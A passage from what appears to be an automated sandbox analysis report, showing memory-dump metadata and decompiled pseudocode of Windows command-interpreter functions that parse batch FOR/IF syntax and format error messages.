                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ConsoleMode_get_osfhandle
                                  • String ID: CMD.EXE
                                  • API String ID: 1606018815-3025314500
                                  • Opcode ID: c88543bab78dc74b7adb23c98653138cdb5769613564fb44c65a31c7751b8f61
                                  • Instruction ID: b3cd36506c3a80339d58b83b7ccf82b5b1869f7358550ba26169434a4e2e4ee8
                                  • Opcode Fuzzy Hash: c88543bab78dc74b7adb23c98653138cdb5769613564fb44c65a31c7751b8f61
                                  • Instruction Fuzzy Hash: 553198B1A00604ABD7146F78FC0AB2637B8FB05715F0C062DF866D75E0D775AAA0DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00159835, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 300COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00159835(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* __ebp;
				intOrPtr _t76;
				intOrPtr _t87;
				intOrPtr _t90;
				signed int _t91;
				signed char _t103;
				signed int _t107;
				intOrPtr _t108;
				signed int _t125;
				signed int _t144;
				intOrPtr* _t179;
				void* _t182;

				_t153 = __edx;
				_t123 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t179 = __ecx;
				_t114 = 0;
				_t182 = __edx;
				_v8 = 0;
				_t76 =  *__ecx;
				if(_t76 > 0x37) {
					__eflags = _t76 - 0x38;
					if(__eflags == 0) {
						E00159899(0, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						L78:
						_t125 =  *(_t179 + 0x3c);
						L79:
						E00159835(_t125, _t182, _a4);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L54:
						__imp__longjmp(0x18b8f8, 0xffffffff);
						L55:
						E00159899(_t114, _a4, "(", _t114);
						_v8 = ")";
						L60:
						E00159835( *((intOrPtr*)(_t179 + 0x38)), _t182, _a4);
						E00159899(_t114, _a4, _v8, _t114);
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L7;
						}
						__eflags =  *_t179 - 0x3b;
						if( *_t179 == 0x3b) {
							goto L7;
						}
						goto L78;
					}
					__eflags = _t76 - 0x3a;
					if(_t76 <= 0x3a) {
						_v8 = L"== ";
						__eflags =  *0x193cc9;
						if( *0x193cc9 != 0) {
							_t87 =  *((intOrPtr*)(__ecx + 0x44));
							__eflags = _t87 - 1;
							if(_t87 != 1) {
								__eflags = _t87 - 2;
								if(_t87 != 2) {
									__eflags = _t87 - 3;
									if(_t87 != 3) {
										__eflags = _t87 - 4;
										if(_t87 != 4) {
											__eflags = _t87 - 5;
											if(_t87 != 5) {
												__eflags = _t87 - 6;
												if(_t87 == 6) {
													_v8 = L"GEQ ";
												}
											} else {
												_v8 = L"GTR ";
											}
										} else {
											_v8 = L"LEQ ";
										}
									} else {
										_v8 = L"LSS ";
									}
								} else {
									_v8 = L"NEQ ";
								}
							} else {
								_v8 = L"EQU ";
							}
						}
						E00159899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)), 1);
						_t114 = 0;
						_push(0);
						_push(_v8);
						L4:
						E00159899(_t114, _a4);
						if( *(_t179 + 0x3c) != _t114) {
							E00159899(_t114, _a4,  *(_t179 + 0x3c), _t114);
						}
						E00159CA6(_t179, _t182, _a4);
						goto L7;
					}
					__eflags = _t76 - 0x3b;
					if(_t76 == 0x3b) {
						L13:
						E00159CA6(_t123, _t153, _a4);
						_t114 = 1;
						__eflags =  *_t179 - 0x2e;
						if( *_t179 < 0x2e) {
							goto L60;
						}
						__eflags =  *_t179 - 0x2f;
						if( *_t179 <= 0x2f) {
							_v8 = "&";
							goto L60;
						}
						__eflags =  *_t179 - 0x30;
						if( *_t179 == 0x30) {
							_v8 = L"||";
							goto L60;
						}
						__eflags =  *_t179 - 0x31;
						if( *_t179 == 0x31) {
							_v8 = L"&&";
							goto L60;
						}
						__eflags =  *_t179 - 0x32;
						if( *_t179 == 0x32) {
							_v8 = "|";
							goto L60;
						}
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L55;
						} else {
							__eflags =  *_t179 - 0x3b;
							if( *_t179 == 0x3b) {
								E00159899(1, _a4, "@", 1);
								_v8 = " ";
							}
							goto L60;
						}
					}
					__eflags = _t76 - 0x3c;
					if(_t76 != 0x3c) {
						goto L54;
					}
					_t90 =  *0x198510;
					__eflags = _t90 - 0x2396;
					if(_t90 != 0x2396) {
						__eflags = _t90 - 0x2395;
						if(_t90 != 0x2395) {
							__eflags = _t90 - 0x2390;
							if(_t90 != 0x2390) {
								goto L54;
							}
							_t91 = L"REM /?";
							L53:
							E00159899(_t114, _a4, _t91, 1);
							goto L7;
						}
						_t91 = L"IF /?";
						goto L53;
					}
					_t91 = L"FOR /?";
					goto L53;
				}
				if(_t76 >= 0x34 || _t76 == 0) {
					L3:
					_push(1);
					_push( *((intOrPtr*)(_t179 + 0x38)));
					goto L4;
				} else {
					__eflags = _t76 - 0x2b;
					if(_t76 == 0x2b) {
						E00159899(1, _a4, L"FOR", 1);
						__eflags =  *0x193cc9;
						if( *0x193cc9 == 0) {
							L41:
							E00159899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 6, 1);
							E00159899(1, _a4, "(", 1);
							E00159899(1, _a4,  *(_t179 + 0x3c), 0);
							E00159899(1, _a4, ")", 0);
							E00159899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 0x2c, 1);
							_t125 =  *(_t179 + 0x40);
							goto L79;
						}
						_t103 =  *(__ecx + 0x48);
						__eflags = 1 & _t103;
						if((1 & _t103) == 0) {
							__eflags = _t103 & 0x00000002;
							if((_t103 & 0x00000002) == 0) {
								__eflags = _t103 & 0x00000008;
								if((_t103 & 0x00000008) == 0) {
									__eflags = _t103 & 0x00000004;
									if((_t103 & 0x00000004) == 0) {
										goto L41;
									}
									_push(1);
									_push(L"/R");
									L38:
									E00159899(1, _a4);
									__eflags =  *(_t179 + 0x4c);
									if( *(_t179 + 0x4c) == 0) {
										goto L41;
									}
									_push(1);
									_push( *(_t179 + 0x4c));
									goto L40;
								}
								_push(1);
								_push(L"/F");
								goto L38;
							}
							_push(1);
							_push(L"/D");
							goto L40;
						} else {
							_push(1);
							_push(L"/L");
							L40:
							E00159899(1, _a4);
							goto L41;
						}
					}
					__eflags = _t76 - 0x2c;
					if(_t76 == 0x2c) {
						E00159899(1, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						_t107 =  *(__ecx + 0x3c);
						_t144 = 0;
						__eflags =  *_t107 - 0x38;
						if( *_t107 == 0x38) {
							_t108 =  *((intOrPtr*)(_t107 + 0x3c));
							__eflags =  *((intOrPtr*)(_t108 + 0x40)) - 2;
							_t107 =  *(__ecx + 0x3c);
							if( *((intOrPtr*)(_t108 + 0x40)) == 2) {
								_t144 = L"/I";
							}
						} else {
							asm("sbb ecx, ecx");
							_t144 =  !( ~( *((intOrPtr*)(_t107 + 0x40)) - 2)) & L"/I";
						}
						__eflags = _t144;
						if(_t144 != 0) {
							E00159899(1, _a4, _t144, 1);
							_t107 =  *(_t179 + 0x3c);
						}
						E00159835(_t107, _t182, _a4);
						E00159835( *(_t179 + 0x40), _t182, _a4);
						__eflags =  *(_t179 + 0x48);
						if( *(_t179 + 0x48) == 0) {
							goto L7;
						} else {
							E00159899(1, _a4,  *((intOrPtr*)(_t179 + 0x44)), 1);
							_t125 =  *(_t179 + 0x48);
							goto L79;
						}
					}
					__eflags = _t76 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L54;
					}
					__eflags = _t76 - 0x33;
					if(_t76 > 0x33) {
						goto L54;
					}
					goto L13;
				}
			}

















                                  0x00159835
                                  0x00159835
                                  0x0015983a
                                  0x0015983b
                                  0x0015983f
                                  0x00159841
                                  0x00159843
                                  0x00159845
                                  0x00159848
                                  0x0015984d
                                  0x00170ed1
                                  0x00170ed4
                                  0x00171036
                                  0x0017103b
                                  0x0017103b
                                  0x0017103e
                                  0x00171043
                                  0x0015988e
                                  0x00159896
                                  0x00159896
                                  0x00170eda
                                  0x00170f32
                                  0x00170f39
                                  0x00170f3f
                                  0x00170f4a
                                  0x00170f4f
                                  0x00170f7a
                                  0x00170f82
                                  0x00170f90
                                  0x00170f95
                                  0x00170f98
                                  0x00000000
                                  0x00000000
                                  0x00170f9e
                                  0x00170fa1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00170fa7
                                  0x00170edc
                                  0x00170edf
                                  0x00170fae
                                  0x00170fb6
                                  0x00170fbd
                                  0x00170fbf
                                  0x00170fc2
                                  0x00170fc4
                                  0x00170fcf
                                  0x00170fd2
                                  0x00170fdd
                                  0x00170fe0
                                  0x00170feb
                                  0x00170fee
                                  0x00170ff9
                                  0x00170ffc
                                  0x00171007
                                  0x0017100a
                                  0x0017100c
                                  0x0017100c
                                  0x00170ffe
                                  0x00170ffe
                                  0x00170ffe
                                  0x00170ff0
                                  0x00170ff0
                                  0x00170ff0
                                  0x00170fe2
                                  0x00170fe2
                                  0x00170fe2
                                  0x00170fd4
                                  0x00170fd4
                                  0x00170fd4
                                  0x00170fc6
                                  0x00170fc6
                                  0x00170fc6
                                  0x00170fc4
                                  0x0017101c
                                  0x00171021
                                  0x00171023
                                  0x00171024
                                  0x00159865
                                  0x0015986a
                                  0x00159872
                                  0x0015987d
                                  0x0015987d
                                  0x00159889
                                  0x00000000
                                  0x00159889
                                  0x00170ee5
                                  0x00170ee8
                                  0x00170d18
                                  0x00170d1b
                                  0x00170d22
                                  0x00170d23
                                  0x00170d26
                                  0x00000000
                                  0x00000000
                                  0x00170d2c
                                  0x00170d2f
                                  0x00170f73
                                  0x00000000
                                  0x00170f73
                                  0x00170d35
                                  0x00170d38
                                  0x00170f6a
                                  0x00000000
                                  0x00170f6a
                                  0x00170d3e
                                  0x00170d41
                                  0x00170f61
                                  0x00000000
                                  0x00170f61
                                  0x00170d47
                                  0x00170d4a
                                  0x00170f58
                                  0x00000000
                                  0x00170f58
                                  0x00170d50
                                  0x00170d53
                                  0x00000000
                                  0x00170d59
                                  0x00170d59
                                  0x00170d5c
                                  0x00170d6d
                                  0x00170d72
                                  0x00170d72
                                  0x00000000
                                  0x00170d5c
                                  0x00170d53
                                  0x00170eee
                                  0x00170ef1
                                  0x00000000
                                  0x00000000
                                  0x00170ef3
                                  0x00170ef8
                                  0x00170efd
                                  0x00170f06
                                  0x00170f0b
                                  0x00170f14
                                  0x00170f19
                                  0x00000000
                                  0x00000000
                                  0x00170f1b
                                  0x00170f20
                                  0x00170f28
                                  0x00000000
                                  0x00170f28
                                  0x00170f0d
                                  0x00000000
                                  0x00170f0d
                                  0x00170eff
                                  0x00000000
                                  0x00170eff
                                  0x00159856
                                  0x00159860
                                  0x00159860
                                  0x00159862
                                  0x00000000
                                  0x00170cf2
                                  0x00170cf2
                                  0x00170cf5
                                  0x00170e18
                                  0x00170e1d
                                  0x00170e24
                                  0x00170e75
                                  0x00170e82
                                  0x00170e92
                                  0x00170ea1
                                  0x00170eb2
                                  0x00170ec4
                                  0x00170ec9
                                  0x00000000
                                  0x00170ec9
                                  0x00170e26
                                  0x00170e29
                                  0x00170e2b
                                  0x00170e35
                                  0x00170e37
                                  0x00170e41
                                  0x00170e43
                                  0x00170e4d
                                  0x00170e4f
                                  0x00000000
                                  0x00000000
                                  0x00170e51
                                  0x00170e52
                                  0x00170e57
                                  0x00170e5c
                                  0x00170e61
                                  0x00170e65
                                  0x00000000
                                  0x00000000
                                  0x00170e67
                                  0x00170e68
                                  0x00000000
                                  0x00170e68
                                  0x00170e45
                                  0x00170e46
                                  0x00000000
                                  0x00170e46
                                  0x00170e39
                                  0x00170e3a
                                  0x00000000
                                  0x00170e2d
                                  0x00170e2d
                                  0x00170e2e
                                  0x00170e6b
                                  0x00170e70
                                  0x00000000
                                  0x00170e70
                                  0x00170e2b
                                  0x00170cfb
                                  0x00170cfe
                                  0x00170d8a
                                  0x00170d8f
                                  0x00170d92
                                  0x00170d94
                                  0x00170d97
                                  0x00170dad
                                  0x00170db0
                                  0x00170db4
                                  0x00170db7
                                  0x00170db9
                                  0x00170db9
                                  0x00170d99
                                  0x00170da1
                                  0x00170da5
                                  0x00170da5
                                  0x00170dbe
                                  0x00170dc0
                                  0x00170dc9
                                  0x00170dce
                                  0x00170dce
                                  0x00170dd8
                                  0x00170de5
                                  0x00170dea
                                  0x00170dee
                                  0x00000000
                                  0x00170df4
                                  0x00170dfd
                                  0x00170e02
                                  0x00000000
                                  0x00170e02
                                  0x00170dee
                                  0x00170d00
                                  0x00170d03
                                  0x00000000
                                  0x00000000
                                  0x00170d09
                                  0x00000000
                                  0x00000000
                                  0x00170d0f
                                  0x00170d12
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00170d12

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                  • API String ID: 0-366822981
                                  • Opcode ID: 9efafea9f51423be1b4d8aae45ba8874e0b3b1f3aa200816e29104d587150a02
                                  • Instruction ID: f3c8175fee973816dfddddf70e3ef915f6cf779423b37156d261e6c247a763f3
                                  • Opcode Fuzzy Hash: 9efafea9f51423be1b4d8aae45ba8874e0b3b1f3aa200816e29104d587150a02
                                  • Instruction Fuzzy Hash: A9A1E370600309FBCF399F55C98496E7B36FB4A392B20C119F8299F250CB719E99D782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015C6F4, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 41%
                                  			E0015C6F4(long __ecx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				char _v40;
				short _v104;
				void* _v108;
				long _v112;
				char* _v116;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t26;
				char* _t31;
				void* _t37;
				char* _t45;
				intOrPtr _t48;
				WCHAR* _t55;
				void* _t56;
				signed int _t57;
				signed int _t59;
				long _t60;
				void* _t61;
				int _t62;
				signed int _t63;

				_t22 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t22 ^ _t63;
				_t47 = _a8;
				_t60 = __ecx;
				_v108 = _a8;
				_t62 = 0;
				_v112 = __ecx;
				if(__ecx == 0x13d || FormatMessageW(0x1a00, 0, __ecx, 0, 0x18b980, 0x2000, 0) == 0) {
					__imp___ultoa(_t60,  &_v40, 0x10);
					_t26 = E00160638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(_t62,  ~( ~_t26),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_t31 = L"Application";
					if(_t60 < 0x2328) {
						_t31 = L"System";
					}
					_v116 = _t31;
					_push( &_v120);
					_push(0x2000);
					_push(0x18b980);
					_push(_t62);
					_push(0x13d);
					_push(_t62);
					_push(0x3000);
					goto L6;
				} else {
					_t55 = 0x18b980;
					_t48 = 0x25;
					while(1) {
						_t58 = _t48;
						_t37 = E0015D7D4(_t55, _t48);
						_t56 = _t37;
						if(_t56 == 0) {
							break;
						}
						_t55 = _t56 + 2;
						_t59 =  *_t55 & 0x0000ffff;
						if(_t59 - 0x31 > 8) {
							if(_t59 == _t48) {
								_t55 =  &(_t55[1]);
							}
						} else {
							_t62 = _t62 + 1;
						}
					}
					_t47 = _v108;
					if(_t62 > _a4) {
						_t47 = HeapAlloc(GetProcessHeap(), 0, _t62 << 2);
						if(_t47 == 0) {
							L8:
							return E00166FD0(_t34, _t47, _v8 ^ _t63, _t58, _t60, _t62);
						}
						_t57 = 0;
						if(_t62 == 0) {
							L21:
							_t62 = FormatMessageW(0x3800, 0, _t60, 0, 0x18b980, 0x2000, _t47);
							RtlFreeHeap(GetProcessHeap(), 0, _t47);
							L7:
							_t34 = _t62;
							goto L8;
						}
						_t61 = _v108;
						_t58 = _a4;
						do {
							if(_t57 >= _t58) {
								_t45 = " ";
							} else {
								 *_t61 =  *_t61 + 4;
								_t45 =  *( *_t61 - 4);
							}
							 *(_t47 + _t57 * 4) = _t45;
							_t57 = _t57 + 1;
						} while (_t57 < _t62);
						_t60 = _v112;
						goto L21;
					}
					_push(_t47);
					_push(0x2000);
					_push(0x18b980);
					_push(_t37);
					_push(_t60);
					_push(_t37);
					_push(0x1800);
					L6:
					_t62 = FormatMessageW();
					goto L7;
				}
			}



























                                  0x0015c6fc
                                  0x0015c703
                                  0x0015c707
                                  0x0015c70c
                                  0x0015c70e
                                  0x0015c711
                                  0x0015c713
                                  0x0015c71c
                                  0x0016af0e
                                  0x0016af1f
                                  0x0016af2e
                                  0x0016af38
                                  0x0016af41
                                  0x0016af44
                                  0x0016af4f
                                  0x0016af51
                                  0x0016af51
                                  0x0016af56
                                  0x0016af5c
                                  0x0016af5d
                                  0x0016af62
                                  0x0016af67
                                  0x0016af68
                                  0x0016af6d
                                  0x0016af6e
                                  0x00000000
                                  0x0015c743
                                  0x0015c745
                                  0x0015c74a
                                  0x0015c74b
                                  0x0015c74b
                                  0x0015c74d
                                  0x0015c752
                                  0x0015c756
                                  0x00000000
                                  0x00000000
                                  0x0015c794
                                  0x0015c797
                                  0x0015c7a1
                                  0x0016ae7e
                                  0x0016ae84
                                  0x0016ae84
                                  0x0015c7a7
                                  0x0015c7a7
                                  0x0015c7a7
                                  0x0015c7a1
                                  0x0015c758
                                  0x0015c75e
                                  0x0016aea1
                                  0x0016aea5
                                  0x0015c781
                                  0x0015c791
                                  0x0015c791
                                  0x0016aeab
                                  0x0016aeaf
                                  0x0016aed5
                                  0x0016aef3
                                  0x0016aefc
                                  0x0015c77f
                                  0x0015c77f
                                  0x00000000
                                  0x0015c77f
                                  0x0016aeb1
                                  0x0016aeb4
                                  0x0016aeb7
                                  0x0016aeb9
                                  0x0016aec5
                                  0x0016aebb
                                  0x0016aebb
                                  0x0016aec0
                                  0x0016aec0
                                  0x0016aeca
                                  0x0016aecd
                                  0x0016aece
                                  0x0016aed2
                                  0x00000000
                                  0x0016aed2
                                  0x0015c764
                                  0x0015c765
                                  0x0015c76a
                                  0x0015c76f
                                  0x0015c770
                                  0x0015c771
                                  0x0015c772
                                  0x0015c777
                                  0x0015c77d
                                  0x00000000
                                  0x0015c77d

                                  APIs
                                  • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,0018B980,00002000,00000000,00000000,?,00000000), ref: 0015C735
                                    • Part of subcall function 0015D7D4: wcschr.MSVCRT ref: 0015D7DA
                                  • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,0018B980,00002000,?), ref: 0015C777
                                  • _ultoa.MSVCRT ref: 0016AF0E
                                  • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 0016AF17
                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 0016AF38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                  • String ID: Application$System
                                  • API String ID: 3538039442-3455788185
                                  • Opcode ID: c802f9778274ae83ee49342618ef42ee863c0dfa58c5c8bb7c09e85d65ae3d55
                                  • Instruction ID: 3688112dc7156f7f720743c57f53ca637e93fda258a5dcf44e998b4b0021fa7c
                                  • Opcode Fuzzy Hash: c802f9778274ae83ee49342618ef42ee863c0dfa58c5c8bb7c09e85d65ae3d55
                                  • Instruction Fuzzy Hash: F341E671A40309ABDB149F68CC89FBFBB68EB59751F10016AFA16EF180D7709D44CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001604A0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E001604A0(signed int __eax, void* __ebx, void* __edx, void* __edi) {
				signed int _v4;
				WCHAR* _v8;
				long* _v12;
				long _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v544;
				WCHAR* _v548;
				WCHAR* _v552;
				WCHAR* __esi;
				signed int _t106;
				short _t107;
				void* _t112;
				signed int _t115;
				void* _t117;
				WCHAR** _t119;
				short _t120;
				signed int _t124;
				signed short* _t125;
				WCHAR* _t129;

				_t117 = __ebx;
				_t106 = __eax;
				if( *0x18fa90 != 0x4000) {
					_t107 =  *0x18faa0;
					__eflags = _t107 - 0x28;
					if(_t107 != 0x28) {
						__eflags = _t107 - 0x40;
						if(_t107 == 0x40) {
							goto L140;
						} else {
							goto L150;
						}
					} else {
						L140:
						_t119 = 0x50;
						_t129 = E001600B0(0x50);
						__eflags = _t129;
						if(_t129 == 0) {
							E00179287(0x50);
							__imp__longjmp(0x18b8b8, 1);
							asm("int3");
							_t106 =  *0x50 & 0x0000ffff;
							_t124 = _t106;
							__eflags = _t106;
							if(_t106 != 0) {
								_t106 = 0;
								__eflags = 0;
								do {
									_t125 = _t119;
									_t119 = _t119 + _t129;
									__eflags =  *_t119;
								} while ( *_t119 != 0);
								_t124 =  *_t125 & 0x0000ffff;
							}
							__eflags = _t124 - 0x3a;
							if(_t124 != 0x3a) {
								 *0x17d55c = 3;
							}
							return _t106;
						} else {
							__eflags =  *0x18faa0 - 0x28;
							if( *0x18faa0 != 0x28) {
								 *_t129 = 0x3b;
								_t120 = 0;
							} else {
								 *_t129 = 0x33;
								do {
									_t115 = E0015F030(0x10);
									__eflags =  *0x18faa0 - 0xa;
								} while ( *0x18faa0 == 0xa);
								__eflags = 0;
								E0015F300(_t115, 0, 0, 0);
								_t120 = 0x33;
							}
							_t129[0x1c] = E0015DC74(_t117, _t120);
							__eflags =  *_t129 - 0x3b;
							if( *_t129 == 0x3b) {
								L147:
								return _t129;
							} else {
								_t112 = E0015F030(0x10);
								__eflags = _t112 - 0x29;
								if(_t112 != 0x29) {
									L150:
									E001782EB(0x10);
									__eflags = 0;
									return 0;
								} else {
									goto L147;
								}
							}
						}
					}
				} else {
					__imp___wcsicmp(L"FOR", 0x18faa0);
					__esp = __esp + 8;
					__eflags = __eax;
					if(__eax == 0) {
						L152:
						_pop(__esi);
						__edi = 0;
						__imp___wcsicmp(L"FOR/?", __edi, __esi);
						_pop(__ecx);
						__ecx = 0x18faa0;
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = 0;
							__edi = 0;
							 *0x18faa6 = __ax;
							__edi = 1;
						}
						__ecx = 0x2b;
						 *0x18fa8c = 0x1e;
						__esi = E0015E9A0(__ecx, __eflags);
						__eax = 0x2f;
						__eflags = __edi;
						if(__edi != 0) {
							 *0x18faa0 = __ax;
							__eax = 0x3f;
							 *0x18faa2 = __ax;
							__eax = 0;
							 *0x18faa4 = __ax;
						} else {
							__ecx = 0;
							__eflags = 0;
							__eax = E0015F030(0);
						}
						__edx = 0x2b;
						__eax = E0015DCE1(__ebx, __edx, __edi);
						__eflags = __al;
						if(__al != 0) {
							__esi[0x1c] = __esi[0x1c] & 0x00000000;
							 *__esi = 0x3c;
						} else {
							__esi[0x24] = __esi[0x24] & 0x00000000;
							__eflags =  *0x193cc9;
							__eax = 0x25;
							if( *0x193cc9 != 0) {
								__edi = 0;
								__edi = 1;
								__eflags = 1;
								while(1) {
									__imp___wcsicmp(L"/L");
									_pop(__ecx);
									__ecx = 0x18faa0;
									__eflags = __eax;
									if(__eax == 0) {
										goto L32;
									}
									L9:
									__imp___wcsicmp(L"/D");
									_pop(__ecx);
									__ecx = 0x18faa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000002;
										L27:
										__ecx = 0;
										__eax = E0015F030(0);
										while(1) {
											__imp___wcsicmp(L"/L");
											_pop(__ecx);
											__ecx = 0x18faa0;
											__eflags = __eax;
											if(__eax == 0) {
												goto L32;
											}
											goto L9;
										}
										goto L32;
									}
									__imp___wcsicmp(L"/F");
									_pop(__ecx);
									__ecx = 0x18faa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000008;
										__ecx = 0;
										__eax = E0015F030(0);
										__ax =  *0x18faa0;
										__ecx = 0x25;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											continue;
										} else {
											__ecx = 0x2f;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__eflags = __esi[0x26];
												if(__esi[0x26] != 0) {
													__eax = E001782EB(__ecx);
												}
												__eax =  *0x18fa8c;
												__ecx = 6 +  *0x18fa8c * 2;
												__eax = E001600B0(__ecx);
												__eflags = __eax;
												if(__eax == 0) {
													goto L212;
												} else {
													__edx =  *0x18fa8c;
													__edx =  &(( *0x18fa8c)[1]);
													goto L26;
												}
											}
										}
										goto L218;
									} else {
										__imp___wcsicmp(L"/R");
										_pop(__ecx);
										__ecx = 0x18faa0;
										__ecx = __esi[0x24];
										__eflags = __eax;
										if(__eax == 0) {
											__esi[0x24] = __ecx;
											__ecx = 0;
											__eax = E0015F030(0);
											__eflags = __esi[0x26];
											if(__esi[0x26] != 0) {
												__eax = E001782EB(__ecx);
											}
											__ax =  *0x18faa0;
											__ecx = 0x25;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__ecx = 0x2f;
												__eflags = __ax - __cx;
												if(__ax == __cx) {
													continue;
												} else {
													__eax =  *0x18fa8c;
													__ecx = 2 +  *0x18fa8c * 2;
													__eax = E001600B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														L212:
														__eax = E00179287(__ecx);
														__imp__longjmp(0x18b8b8, __edi);
														goto L213;
													} else {
														__edx =  *0x18fa8c;
														__edx =  &(( *0x18fa8c)[0]);
														L26:
														__ecx = __eax;
														__esi[0x26] = __eax;
														__eax = E00161040(__eax, __edx, 0x18faa0);
														goto L27;
													}
												}
											}
											goto L218;
										} else {
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 8;
												if(__ecx != 8) {
													__eflags = __ecx - 2;
													if(__ecx != 2) {
														__eflags = __ecx - __edi;
														if(__ecx != __edi) {
															L213:
															__eflags = __ecx - 6;
															if(__ecx != 6) {
																__eflags = __ecx - 4;
																if(__ecx != 4) {
																	__eax = E001782EB(__ecx);
																}
															}
														}
													}
												}
											}
										}
									}
									__eax = 0x25;
									goto L15;
									L32:
									__esi[0x24] = __esi[0x24] | __edi;
									goto L27;
								}
							}
							L15:
							__eflags =  *0x18faa0 - __ax;
							if( *0x18faa0 != __ax) {
								L216:
								__eax = E001782EB(__ecx);
							} else {
								__eax =  *0x18faa2 & 0x0000ffff;
								__eax = iswspace( *0x18faa2 & 0x0000ffff);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									goto L216;
								} else {
									__edx =  *0x18faa2 & 0x0000ffff;
									__ecx = L"=,;";
									__esi[0x22] = __edx;
									__eax = E0015D7D4(__ecx, __edx);
									__eflags = __eax;
									if(__eax != 0) {
										goto L216;
									} else {
										__eflags =  *0x18fa8c - 3;
										if( *0x18fa8c != 3) {
											goto L216;
										}
									}
								}
							}
							__ecx = __esi[0x1c];
							__edi = 0x18faa0;
							_push(0x18faa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E00159C73(__ecx, __edx);
							__ecx = L"IN";
							__eax = E00159C4D(L"IN");
							__ecx = __esi[0x1c];
							_push(0x18faa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E00159C73(__ecx, __edx);
							__eax = E00159936(__ebx);
							__ecx = L"DO";
							__esi[0x1e] = __eax;
							__eax = E00159C4D(L"DO");
							__ecx = __esi[0x1c];
							_push(0x18faa0);
							__ecx = __esi[0x1c] + 0x2c;
							__edx = 8;
							__eax = E00161040(__esi[0x1c] + 0x2c, __edx);
							__ecx = 0x2b;
							__eax = E0015DC74(__ebx, __ecx);
							__esi[0x20] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E001782EB(__ecx);
							}
						}
						_pop(__edi);
						__eax = __esi;
						_pop(__esi);
						return __esi;
					} else {
						__imp___wcsicmp(L"FOR/?", 0x18faa0);
						__esp = __esp + 8;
						__eflags = __eax;
						if(__eax == 0) {
							goto L152;
						} else {
							__imp___wcsicmp(L"IF", 0x18faa0);
							__esp = __esp + 8;
							__eflags = __eax;
							if(__eax == 0) {
								L148:
								_pop(__esi);
								__edi = 0;
								__imp___wcsicmp(L"IF/?", __edi, __esi, __ecx);
								_pop(__ecx);
								__ecx = 0x18faa0;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__edi = 0;
									 *0x18faa4 = __ax;
									__edi = 1;
								}
								__ecx = 0x2c;
								__esi = E0015E9A0(__ecx, __eflags);
								__eflags = __edi;
								if(__edi != 0) {
									__eax = 0x2f;
									 *0x18faa0 = __ax;
									__eax = 0x3f;
									 *0x18faa2 = __ax;
									__eax = 0;
									 *0x18faa4 = __ax;
								} else {
									__ecx = 0;
									__eflags = 0;
									__eax = E0015F030(0);
								}
